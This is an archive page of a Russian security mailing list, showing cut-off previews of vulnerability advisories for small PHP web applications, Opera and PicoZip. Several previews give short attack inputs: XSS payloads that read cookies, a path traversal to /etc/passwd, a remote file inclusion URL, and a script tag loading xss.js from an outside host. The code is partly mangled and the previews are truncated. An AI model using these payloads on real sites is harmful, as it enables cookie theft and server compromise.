← Август 2025 | ||||||
1
|
2
|
3
|
||||
---|---|---|---|---|---|---|
4
|
5
|
6
|
7
|
8
|
9
|
10
|
11
|
12
|
13
|
14
|
15
|
16
|
17
|
18
|
19
|
20
|
21
|
22
|
23
|
24
|
25
|
26
|
27
|
28
|
29
|
30
|
31
|
В наше время взломы сайтов, форумом и чатов стали привычном делом. Для тех кто хочет знать почему это происходит и как этому противостоять и существует наша рассылка.
Статистика
-1 за неделю
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в vlBook.
Компьютер для продвинутых пользователей В этом выпуске: vlBook ПО: vlBook Версия: 1.02 Сайт: http://vlab.info/ О vlBook: VlBook - это бесплатная и маленькая гостевая книга, написанная на PHP, использующая файлы для сохранения сообщений и настроек. Это позволяет осуществить установку и настройку программы. Внутри имеется WYSWING редактор, использование скинов, постоянная поддержка, пакет аватаров и другое. Описание: Этот продукт подвержен XSS-атаке. Переменная сообщений не проверяется до использования, это ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Opera.
Компьютер для продвинутых пользователей В этом выпуске: Opera ПО: Opera Версия: 8.54 Сайт: http://www.opera.com/ Описание: Слишком большой размер высоты и ширины полей характерные в определенных значениях для JPEG файлов, вызовет переполнение, которое возникает при загрузки изображения. Когда изображение загрузиться в память, возможно выполнить любой код. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-ma...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Dragons Somechess.
Компьютер для продвинутых пользователей В этом выпуске: Somechess ПО: Somechess Версия: 1.5 Сайт: http://www.astrodogpress.org/chess/ Описание: Продукт использует дампинг SQL-информации внутри таблиц. Если удастся вызвать ошибку, она позволит создавать таблицы и изменять информацию в них. В процессе, возможно, добавлять и просматривать игроков. Есть возможность просмотра пароля пользователей сервиса через phpmyadmin или любой аналог. Использование: В поле новое имя вставьте любой JavaScript-код. Например, ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Dragons cjGuestbook.
Компьютер для продвинутых пользователей В этом выпуске: cjGuestbook ПО: cjGuestbook Версия: 1.3 Сайт: http://cmj-php.opanelhosting.com Описание: Уязвимость заключается в неправильной обработке сообщений гостевой книги. cjGuestbook использует bb-код и, используя эту уязвимость в ранних изданиях, мы можем провести XSS атаку. Использование: В поле сообщения введите JavaScript код. Наприер, [img]javascript:alert(document.cookie[/img] . Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддерж...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Dragons Kingdom Script.
Компьютер для продвинутых пользователей В этом выпуске: Dragons Kingdom Script ПО: Dragons Kingdom Script Версия: 1.0 Сайт: http://www.dkscript.com/ Описание: Уязвимость заключается в возможности провести XSS атаку. При отправке сообщение на ящик, текст сообщения не проверяется, что дает нам возможность вставить какую-либо команду. Такая же ошибка существует и на форуме при отправке сообщений. Использование: В поле письма или в форуме наберите: <IMG SRC=javascript:alert'привет> Не забудьте проголосовать...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в singapore gallery.
Компьютер для продвинутых пользователей В этом выпуске: singapore gallery ПО: singapore gallery Версия: 0.10.0 Сайт: http://www.sgal.org/ Описание: Уязвимый код: 16 . require_once "includes/singapore.class.php"; 19 . $sg = new Singapore); 35 . include $sg>config>base_path$sg>config>pathto_current_template"index.tpl.php"; > Использование: http://localhost/singapore/index.php?template./././././etc/passwd%00 http://localhost/singapore/index.php?template=<script>alert'Привет);</script> Не забудьте прогол...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MPCS.
Компьютер для продвинутых пользователей В этом выпуске: MPCS ПО: MPCS Версия: 0.2 Сайт: h ttp://tpvgames.co.uk/mpcs Описание: Уязвимость заключается в не обработки некоторых параметров файла http://tpvgames.co.uk/mpcs. Вы можете исполнить любой HTML или скрипт код. Использование: http://www.example.com/comment.php?pageid=12 <script src=http://www.youfucktard.com/xss.js></script> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня мож...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в ISPConfig.
Компьютер для продвинутых пользователей В этом выпуске: ISPConfig ПО: ISPConfig Версия: 2.2.3 Описание: Ошибка содержится в файле server.inc.php линия 35: include_once$go_info"isp"classes_root] . $go_info"server"dir_trenner] "ispconfig_template.lib.php); Ошибка содержится в файле app.inc.php линии 48-49: $dbclass = $go_info"server"classes_root] . $go_info"server"dir_trenner] "ispconfig_db$go_info"server"db_type.lib.php"; include_once$dbclass); Ошибка содержится в файле login.php линии 30-31: $dbclass = $go...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PhpBlueDragon CMS.
Компьютер для продвинутых пользователей В этом выпуске: PhpBlueDragon CMS ПО: PhpBlueDragon CMS Версия: 2.9.1 Описание: Ошибка содержится в файле template.php в строке 23: require$vsDragonRootPath"public_includes/pub_kernel/pbd_template_custom.php); Переменная $vsDragonRootPath не проверяеться до выполнения. Использование: http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath[cmd_url]/ Не забудьте проголосовать за выпуск! Рассылка создана и ведется п...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PicoZip.
Компьютер для продвинутых пользователей В этом выпуске: PicoZip ПО: PicoZip Версия: 4.01 Описание: Уязвимость может использоваться для выведения из строя системы. Уязвимость состоит в ошибке библиотеки "zipinfo.dll. Критическая ситуация возникает при чтении ACE, RAR или ZIP архивов, которые содержат файл с очень большим именем. Это может быть использовано для переполнения буфера обмена, когда пользователь передвигает курсором мыши любой зараженный архив в Windows Explorer или другой программе использующею ...